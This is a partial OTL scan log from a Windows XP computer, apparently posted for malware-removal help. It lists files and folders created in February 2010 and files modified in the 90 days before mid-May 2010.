[2010/02/21 19:35:20 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Logishrd
[2010/02/21 19:34:14 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Logitech
[2010/02/21 19:33:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Logitech
[2010/02/21 19:30:14 | 000,000,000 | ---D | C] -- C:\Program Files\Logitech
[2010/02/21 19:30:14 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Logitech
[2010/02/21 18:15:00 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\dvdcss
[2010/02/21 17:30:12 | 000,719,872 | ---- | C] (Abysmal Software) -- C:\WINDOWS\System32\devil.dll
[2010/02/21 17:30:12 | 000,369,152 | ---- | C] (The Public) -- C:\WINDOWS\System32\avisynth.dll
[2010/02/21 17:30:10 | 000,070,656 | ---- | C] (www.helixcommunity.org) -- C:\WINDOWS\System32\yv12vfw.dll
[2010/02/21 17:30:10 | 000,070,656 | ---- | C] (www.helixcommunity.org) -- C:\WINDOWS\System32\i420vfw.dll
[2010/02/21 17:30:09 | 000,000,000 | ---D | C] -- C:\Program Files\AviSynth 2.5
[2010/02/21 17:29:57 | 000,216,064 | ---- | C] (MONOGRAM Multimedia, s.r.o.) -- C:\WINDOWS\System32\nbDX.dll
[2010/02/21 17:29:57 | 000,186,880 | ---- | C] (RadLight) -- C:\WINDOWS\System32\RLOgg.ax
[2010/02/21 17:29:57 | 000,179,200 | ---- | C] (Gabest) -- C:\WINDOWS\System32\DiracSplitter.ax
[2010/02/21 17:29:57 | 000,169,472 | ---- | C] (Gabest) -- C:\WINDOWS\System32\MatroskaDX.ax
[2010/02/21 17:29:57 | 000,163,328 | ---- | C] (Gabest) -- C:\WINDOWS\System32\flvDX.dll
[2010/02/21 17:29:57 | 000,161,792 | ---- | C] (Gabest) -- C:\WINDOWS\System32\RealMediaDX.ax
[2010/02/21 17:29:57 | 000,123,904 | ---- | C] (CoreCodec) -- C:\WINDOWS\System32\AVCDX.ax
[2010/02/21 17:29:57 | 000,092,672 | ---- | C] (RadLight) -- C:\WINDOWS\System32\RLVorbisDec.ax
[2010/02/21 17:29:57 | 000,090,112 | ---- | C] (-) -- C:\WINDOWS\System32\TTADSSplitter.ax
[2010/02/21 17:29:57 | 000,090,112 | ---- | C] (-) -- C:\WINDOWS\System32\TTADSDecoder.ax
[2010/02/21 17:29:57 | 000,067,584 | ---- | C] (RadLight, LLC) -- C:\WINDOWS\System32\RLTheoraDec.ax
[2010/02/21 17:29:57 | 000,031,232 | ---- | C] (Hans Mayerl) -- C:\WINDOWS\System32\msfDX.dll
[2010/02/21 17:29:51 | 000,000,000 | ---D | C] -- C:\Program Files\eRightSoft
[2010/02/21 16:53:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Padus
[2010/02/21 15:32:34 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\ScummVM
[2010/02/21 10:59:30 | 000,000,000 | ---D | C] -- C:\Program Files\ScummVM
[2010/02/21 10:58:38 | 000,000,000 | ---D | C] -- C:\Program Files\D-Fend Reloaded
[2010/02/20 23:32:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Audacity
[2010/02/20 23:29:42 | 000,000,000 | ---D | C] -- C:\Program Files\VST
[2010/02/20 23:28:12 | 000,000,000 | ---D | C] -- C:\Program Files\Lame for Audacity
[2010/02/20 23:27:53 | 000,000,000 | ---D | C] -- C:\Program Files\Audacity
[2010/02/20 23:27:31 | 000,000,000 | ---D | C] -- C:\Program Files\Audacity 1.3 Beta (Unicode)
[2010/02/20 23:04:50 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\vfx
[2010/02/20 23:04:42 | 000,000,000 | ---D | C] -- C:\Program Files\VFX
[2010/02/20 03:37:47 | 000,000,000 | ---D | C] -- C:\Program Files\Evernote
[2010/02/18 20:44:19 | 000,000,000 | ---D | C] -- C:\Program Files\Alwil Software
[2010/02/18 20:18:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\KeePassX
[2010/02/18 20:18:18 | 000,000,000 | ---D | C] -- C:\Program Files\KeePassX
[2010/02/18 20:15:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Dropbox
[2010/02/18 05:40:48 | 000,038,224 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2010/02/18 05:40:46 | 000,020,952 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2010/02/18 05:40:46 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[2010/02/18 05:07:54 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\appmgmt
[2010/02/17 06:02:09 | 000,157,712 | ---- | C] (Trend Micro Inc.) -- C:\WINDOWS\System32\drivers\tmcomm.sys
[2010/02/17 05:47:03 | 000,000,000 | ---D | C] -- C:\WINDOWS\McAfee.com
[2010/02/17 05:26:08 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Malwarebytes
[2010/02/17 05:26:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Malwarebytes
[2010/02/16 23:29:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\pss
[2010/02/16 23:02:25 | 000,000,000 | -HSD | C] -- C:\WINDOWS\CSC
[2010/02/16 22:34:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Cubase LE 4
[2010/02/16 21:29:46 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Studio One
[2010/02/16 21:27:34 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\PreSonus
[2010/02/16 21:01:58 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Audio
[2010/02/16 21:00:42 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Steinberg
[2010/02/16 00:14:27 | 000,000,000 | ---D | C] -- C:\Program Files\Steinberg
[2010/02/16 00:14:27 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Steinberg
[2010/02/16 00:13:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Syncrosoft
[2010/02/16 00:12:59 | 000,000,000 | ---D | C] -- C:\Program Files\Syncrosoft
[2010/02/16 00:06:41 | 000,183,360 | ---- | C] (TASCAM) -- C:\WINDOWS\System32\US-122_MKII_US-144_MKII.CPL
[2010/02/16 00:06:41 | 000,000,000 | ---D | C] -- C:\WINDOWS\usb-audio.deTascam
[2010/02/16 00:05:53 | 000,399,424 | ---- | C] (TASCAM) -- C:\WINDOWS\System32\drivers\tascusb2.sys
[2010/02/16 00:05:53 | 000,039,488 | ---- | C] (TASCAM) -- C:\WINDOWS\System32\drivers\tscusb2a.sys
[2010/02/16 00:05:53 | 000,026,688 | ---- | C] (TASCAM) -- C:\WINDOWS\System32\drivers\tscusb2m.sys
[2010/02/15 17:13:12 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\OpenOffice.org
[2010/02/15 16:04:06 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Downloads
[2010/02/15 16:04:05 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\NewsLeecher
[2010/02/15 09:48:44 | 000,000,000 | ---D | C] -- C:\WINDOWS\Sun
[2010/02/15 01:22:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\VirtualizedApplications
[2010/02/14 23:16:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Microsoft Help
[2010/02/14 23:16:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Microsoft Help
[2010/02/14 23:10:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\NVD
[2010/02/14 23:10:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\NVD
[2010/02/14 23:09:22 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\SoftGrid Client
[2010/02/14 23:08:46 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\SoftGrid Client
[2010/02/14 23:05:58 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\TP
[2010/02/14 21:25:15 | 000,000,000 | ---D | C] -- C:\Program Files\Seagate
[2010/02/14 01:21:31 | 000,000,000 | ---D | C] -- C:\Program Files\uTorrent
[2010/02/14 01:21:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\uTorrent
[2010/02/14 01:16:10 | 000,000,000 | ---D | C] -- C:\Program Files\GrabIt
[2010/02/14 01:12:30 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\DAEMON Tools Lite
[2010/02/14 01:12:25 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Lite
[2010/02/14 01:01:57 | 000,000,000 | ---D | C] -- C:\Program Files\MSXML 4.0
[2010/02/14 00:50:53 | 000,000,000 | ---D | C] -- C:\WINDOWS\Minidump
[2010/02/14 00:23:43 | 000,000,000 | ---D | C] -- C:\Program Files\iNFO
[2010/02/14 00:14:45 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Amazon
[2010/02/13 23:18:15 | 000,798,208 | ---- | C] (Winstep Software Technologies) -- C:\WINDOWS\System32\NextControls.ocx
[2010/02/13 23:18:15 | 000,000,000 | ---D | C] -- C:\Program Files\Winstep
[2010/02/13 23:18:15 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\Winstep
[2010/02/13 23:15:03 | 000,299,520 | ---- | C] (InstallShield Corporation, Inc.) -- C:\WINDOWS\uninst.exe
[2010/02/13 23:15:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\WINDOWS
[2010/02/13 21:00:59 | 000,000,000 | ---D | C] -- C:\Program Files\a-squared Anti-Malware
[2010/02/13 20:56:46 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\My Widgets
[2010/02/13 20:56:39 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Yahoo
[2010/02/13 20:56:36 | 000,000,000 | ---D | C] -- C:\Program Files\Yahoo!
[2010/02/13 19:08:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\ApplicationHistory
[2010/02/13 19:07:19 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\windowspowershell
[2010/02/13 17:54:14 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\microsoft
[2010/02/13 17:54:05 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Live SkyDrive
[2010/02/13 17:53:50 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Live
[2010/02/13 17:53:29 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft SQL Server Compact Edition
[2010/02/13 17:48:31 | 000,000,000 | ---D | C] -- C:\Program Files\Windows XP Fun Pack
[2010/02/13 17:44:51 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\WMTools Downloaded Files
[2010/02/13 17:44:41 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Me\My Documents\My Videos
[2010/02/13 17:43:07 | 000,000,000 | ---D | C] -- C:\Program Files\Photo Story 3 for Windows
[2010/02/13 17:42:41 | 000,000,000 | ---D | C] -- C:\Program Files\SyncToy 2.1
[2010/02/13 17:42:26 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Sync Framework
[2010/02/13 17:30:19 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Windows Live
[2010/02/13 17:29:20 | 000,000,000 | ---D | C] -- C:\Program Files\WallpaperToy
[2010/02/13 17:22:49 | 000,000,000 | ---D | C] -- C:\Program Files\Temp
[2010/02/13 17:10:15 | 000,000,000 | -H-D | C] -- C:\WINDOWS\PIF
[2010/02/13 16:50:42 | 000,000,000 | ---D | C] -- C:\Program Files\CodeGazer
[2010/02/13 16:50:15 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\ImgBurn
[2010/02/13 16:43:39 | 000,000,000 | ---D | C] -- C:\Program Files\PeerBlock
[2010/02/13 16:42:33 | 003,939,704 | ---- | C] (Sysinternals - www.sysinternals.com) -- C:\Program Files\procexp.exe
[2010/02/13 11:31:58 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\XPSViewer
[2010/02/13 11:31:55 | 000,000,000 | ---D | C] -- C:\Program Files\MSBuild
[2010/02/13 11:31:43 | 000,000,000 | ---D | C] -- C:\Program Files\Reference Assemblies
[2010/02/13 11:28:51 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Identities
[2010/02/13 11:28:26 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Desktop Search
[2010/02/13 11:28:26 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\GroupPolicy
[2010/02/13 11:28:01 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Media Connect 2
[2010/02/13 11:27:15 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\drivers\UMDF
[2010/02/13 11:27:15 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\LogFiles
[2010/02/13 11:26:12 | 000,000,000 | R-SD | C] -- C:\WINDOWS\assembly
[2010/02/13 11:26:12 | 000,000,000 | ---D | C] -- C:\WINDOWS\Microsoft.NET
[2010/02/13 10:57:58 | 000,000,000 | ---D | C] -- C:\Program Files\ImgBurn
[2010/02/13 10:55:30 | 000,000,000 | ---D | C] -- C:\Program Files\OpenOffice.org 3
[2010/02/13 10:43:06 | 000,000,000 | ---D | C] -- C:\WINDOWS\Prefetch
[2010/02/13 09:53:24 | 000,000,000 | -H-D | C] -- C:\WINDOWS\msdownld.tmp
[2010/02/13 09:53:18 | 000,000,000 | ---D | C] -- C:\WINDOWS\Logs
[2010/02/13 09:47:27 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\scripting
[2010/02/13 09:47:27 | 000,000,000 | ---D | C] -- C:\WINDOWS\l2schemas
[2010/02/13 09:47:27 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\en
[2010/02/13 09:47:27 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\bits
[2010/02/13 09:45:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\network diagnostic
[2010/02/13 09:43:10 | 000,000,000 | -H-D | C] -- C:\WINDOWS\$NtServicePackUninstall$
[2010/02/13 00:41:32 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\CanonBJ
[2010/02/13 00:41:30 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\CanonIJ Uninstaller Information
[2010/02/13 00:41:24 | 000,000,000 | -H-D | C] -- C:\Program Files\CanonBJ
[2010/02/13 00:41:15 | 000,000,000 | ---D | C] -- C:\Program Files\Canon
[2010/02/13 00:12:40 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Me\PrivacIE
[2010/02/13 00:09:49 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Me\IETldCache
[2010/02/13 00:06:00 | 000,000,000 | ---D | C] -- C:\WINDOWS\ie8updates
[2010/02/13 00:05:48 | 000,000,000 | ---D | C] -- C:\WINDOWS\WBEM
[2010/02/13 00:04:51 | 000,000,000 | -H-D | C] -- C:\WINDOWS\ie8
[2010/02/13 00:04:51 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\en-US
[2010/02/13 00:03:17 | 000,000,000 | ---D | C] -- C:\Program Files\7-Zip
[2010/02/12 23:59:19 | 000,000,000 | ---D | C] -- C:\WINDOWS\ServicePackFiles
[2010/02/12 23:53:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Windows Genuine Advantage
[2010/02/12 23:52:29 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Me\UserData
[2010/02/12 23:22:42 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Wise Installation Wizard
[2010/02/12 23:22:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\NVIDIA Corporation
[2010/02/12 23:22:28 | 000,000,000 | ---D | C] -- C:\Program Files\NVIDIA Corporation
[2010/02/12 23:19:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Downloads
[2010/02/12 23:17:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Mozilla
[2010/02/12 23:17:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Mozilla
[2010/02/12 23:16:42 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Lang
[2010/02/12 22:52:09 | 000,000,000 | ---D | C] -- C:\Program Files\pidgin-otr
[2010/02/12 22:51:49 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox
[2010/02/12 22:50:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\.purple
[2010/02/12 22:50:23 | 000,000,000 | ---D | C] -- C:\Program Files\Pidgin
[2010/02/12 22:50:16 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\GTK
[2010/02/12 22:36:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Alwil Software
[2010/02/12 22:33:50 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\PreInstall
[2010/02/12 22:29:47 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\SoftwareDistribution
[2010/02/12 22:25:39 | 000,000,000 | ---D | C] -- C:\Program Files\obj
[2010/02/12 22:25:08 | 000,000,000 | ---D | C] -- C:\WINDOWS\GBD
[2010/02/12 22:22:56 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Adobe
[2010/02/12 22:22:48 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Macromedia
[2010/02/12 22:20:01 | 000,000,000 | ---D | C] -- C:\Program Files\GIGABYTE
[2010/02/12 22:18:39 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\ReinstallBackups
[2010/02/12 22:18:36 | 000,000,000 | ---D | C] -- C:\Program Files\AMD
[2010/02/12 22:18:21 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\InstallShield
[2010/02/12 22:15:59 | 000,105,088 | ---- | C] (Realtek Semiconductor Corporation                           ) -- C:\WINDOWS\System32\drivers\Rtenicxp.sys
[2010/02/12 22:14:31 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\RTCOM
[2010/02/12 22:13:48 | 000,358,944 | ---- | C] (Realtek Semiconductor Crop.) -- C:\WINDOWS\vncutil.exe
[2010/02/12 22:13:47 | 000,129,568 | ---- | C] (Realtek Semiconductor) -- C:\WINDOWS\RtkAudioService.exe
[2010/02/12 22:13:37 | 002,815,520 | ---- | C] (RealTek Semicoductor Corp.) -- C:\WINDOWS\ALCWZRD.EXE
[2010/02/12 22:13:37 | 001,691,480 | ---- | C] (Creative) -- C:\WINDOWS\System32\drivers\Ambfilt.sys
[2010/02/12 22:13:36 | 000,000,000 | ---D | C] -- C:\Program Files\Realtek
[2010/02/12 22:13:35 | 000,000,000 | -H-D | C] -- C:\Program Files\InstallShield Installation Information
[2010/02/12 22:13:27 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\InstallShield
[2010/02/12 22:13:13 | 000,000,000 | ---D | C] -- C:\Program Files\DIFX
[2010/02/12 22:13:12 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\DRVSTORE
[2010/02/12 22:08:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Identities
[2010/02/12 22:08:37 | 000,000,000 | -H-D | C] -- C:\Program Files\Uninstall Information
[2010/02/12 22:08:34 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Me\My Documents\My Pictures
[2010/02/12 22:08:34 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Me\My Documents\My Music
[2010/02/12 22:08:20 | 000,000,000 | --SD | C] -- C:\Documents and Settings\Me\Application Data\Microsoft
[2010/02/12 22:08:20 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Me\SendTo
[2010/02/12 22:08:20 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Me\Application Data
[2010/02/12 22:08:20 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Me\Start Menu
[2010/02/12 22:08:20 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Me\Favorites
[2010/02/12 22:08:20 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Me\Cookies
[2010/02/12 22:08:20 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Me\Templates
[2010/02/12 22:08:20 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Me\PrintHood
[2010/02/12 22:08:20 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Me\NetHood
[2010/02/12 22:08:20 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Me\Local Settings
[2010/02/12 22:08:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents
[2010/02/12 22:08:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Microsoft
[2010/02/12 22:08:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop
[2010/02/12 22:07:47 | 000,000,000 | ---D | C] -- C:\WINDOWS\SoftwareDistribution
[2010/02/12 22:07:45 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Microsoft
[2010/02/12 22:07:44 | 000,000,000 | --SD | C] -- C:\Documents and Settings\LocalService\Application Data\Microsoft
[2010/02/12 22:07:44 | 000,000,000 | ---D | C] -- C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft
[2010/02/12 22:07:29 | 000,000,000 | --SD | C] -- C:\Documents and Settings\NetworkService\Application Data\Microsoft
[2010/02/12 22:07:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft
[2010/02/12 22:05:55 | 000,079,872 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rwia330.dll
[2010/02/12 22:05:55 | 000,079,872 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rwia001.dll
[2010/02/12 22:04:42 | 000,054,528 | ---- | C] (Philips Semiconductors GmbH) -- C:\WINDOWS\System32\dllcache\cap7146.sys
[2010/02/12 22:04:13 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\xircom
[2010/02/12 22:04:13 | 000,000,000 | ---D | C] -- C:\Program Files\xerox
[2010/02/12 22:04:13 | 000,000,000 | ---D | C] -- C:\Program Files\microsoft frontpage
[2010/02/12 22:03:50 | 000,000,000 | -H-D | C] -- C:\WINDOWS\$hf_mig$
[2010/02/12 22:02:47 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\All Users\DRM
[2010/02/12 22:02:39 | 000,000,000 | --SD | C] -- C:\WINDOWS\Downloaded Program Files
[2010/02/12 22:02:39 | 000,000,000 | R--D | C] -- C:\WINDOWS\Offline Web Pages
[2010/02/12 22:02:31 | 000,000,000 | -H-D | C] -- C:\Program Files\WindowsUpdate
[2010/02/12 22:02:05 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\DirectX
[2010/02/12 22:01:12 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Services
[2010/02/12 22:01:07 | 000,000,000 | --SD | C] -- C:\WINDOWS\Tasks
[2010/02/12 22:01:05 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\MSSoap
[2010/02/12 22:00:57 | 000,000,000 | ---D | C] -- C:\WINDOWS\srchasst
[2010/02/12 22:00:56 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Macromed
[2010/02/12 22:00:40 | 000,000,000 | ---D | C] -- C:\Program Files\Movie Maker
[2010/02/12 22:00:25 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Restore
[2010/02/12 22:00:17 | 000,000,000 | ---D | C] -- C:\Program Files\NetMeeting
[2010/02/12 22:00:10 | 000,000,000 | ---D | C] -- C:\Program Files\Outlook Express
[2010/02/12 21:59:57 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\System
[2010/02/12 21:59:55 | 000,000,000 | ---D | C] -- C:\Program Files\Internet Explorer
[2010/02/12 21:59:54 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Documents\My Pictures
[2010/02/12 21:59:31 | 000,000,000 | ---D | C] -- C:\Program Files\ComPlus Applications
[2010/02/12 21:59:25 | 000,000,000 | ---D | C] -- C:\WINDOWS\Registration
[2010/02/12 21:59:18 | 000,000,000 | ---D | C] -- C:\Program Files\Online Services
[2010/02/12 21:59:17 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Documents\My Music
[2010/02/12 21:59:17 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Media Player
[2010/02/12 21:59:12 | 000,000,000 | ---D | C] -- C:\Program Files\Messenger
[2010/02/12 21:59:05 | 000,000,000 | ---D | C] -- C:\Program Files\MSN Gaming Zone
[2010/02/12 21:57:58 | 000,000,000 | ---D | C] -- C:\Program Files\MSN
[2010/02/12 21:57:54 | 000,000,000 | ---D | C] -- C:\Program Files\Windows NT
[2010/02/12 21:57:47 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\MsDtc
[2010/02/12 21:57:44 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Com
[2010/02/12 21:57:24 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Documents\My Videos
[7 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[4 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[1 C:\Documents and Settings\Me\*.tmp files -> C:\Documents and Settings\Me\*.tmp -> ]

[color=#E56717]========== Files - Modified Within 90 Days ==========[/color]

[2010/05/13 20:31:33 | 000,570,880 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Me\Desktop\OTL.exe
[2010/05/13 20:28:37 | 009,175,040 | -H-- | M] () -- C:\Documents and Settings\Me\NTUSER.DAT
[2010/05/13 20:24:33 | 009,115,308 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\pidgin-2.7.0.exe
[2010/05/13 20:23:26 | 000,000,642 | ---- | M] () -- C:\WINDOWS\win.ini
[2010/05/13 20:23:26 | 000,000,315 | RHS- | M] () -- C:\boot.ini
[2010/05/13 20:23:26 | 000,000,227 | ---- | M] () -- C:\WINDOWS\system.ini
[2010/05/13 20:23:00 | 000,001,014 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-746137067-1078081533-839522115-1003UA.job
[2010/05/13 16:58:35 | 000,000,104 | ---- | M] () -- C:\WINDOWS\System32\NvApps.xml
[2010/05/13 16:58:30 | 000,012,598 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2010/05/13 16:58:13 | 000,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
[2010/05/13 16:58:05 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2010/05/12 21:23:00 | 000,000,962 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-746137067-1078081533-839522115-1003Core.job
[2010/05/12 16:15:06 | 000,134,825 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-blank.pdf
[2010/05/12 16:10:02 | 000,182,179 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01(3).pdf
[2010/05/12 16:06:11 | 000,182,349 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01(2).pdf
[2010/05/12 15:45:03 | 000,079,807 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01.pdf
[2010/05/12 15:44:47 | 002,088,136 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01.jpg
[2010/05/12 12:40:06 | 000,000,807 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\PrimoPDF - Drop Files Here to Convert!.lnk
[2010/05/12 12:40:00 | 000,000,314 | ---- | M] () -- C:\WINDOWS\primopdf.ini
[2010/05/12 11:22:31 | 000,000,041 | ---- | M] () -- C:\Documents and Settings\Me\jagex_runescape_preferences.dat
[2010/05/12 11:22:29 | 000,000,075 | ---- | M] () -- C:\Documents and Settings\Me\jagex_runescape_preferences2.dat
[2010/05/11 16:54:22 | 002,359,350 | ---- | M] () -- C:\WINDOWS\Me.bmp
[2010/05/11 16:51:03 | 000,000,487 | ---- | M] () -- C:\Documents and Settings\Me\My Documents\Winstep.lnk
[2010/05/11 16:28:50 | 000,000,244 | ---- | M] () -- C:\Boot.bak
[2010/05/11 16:21:15 | 000,000,178 | -HS- | M] () -- C:\Documents and Settings\Me\ntuser.ini
[2010/05/11 15:08:46 | 000,071,676 | ---- | M] () -- C:\Documents and Settings\Me\My Documents\DriverAgent_scan_results
[2010/05/11 15:01:19 | 001,048,576 | ---- | M] () -- C:\bios-save.rom
[2010/05/11 14:54:31 | 000,023,456 | ---- | M] (Phoenix Technologies) -- C:\WINDOWS\System32\drivers\DrvAgent32.sys
[2010/05/10 13:34:40 | 004,236,752 | -H-- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\IconCache.db
[2010/05/08 18:29:45 | 000,056,832 | ---- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
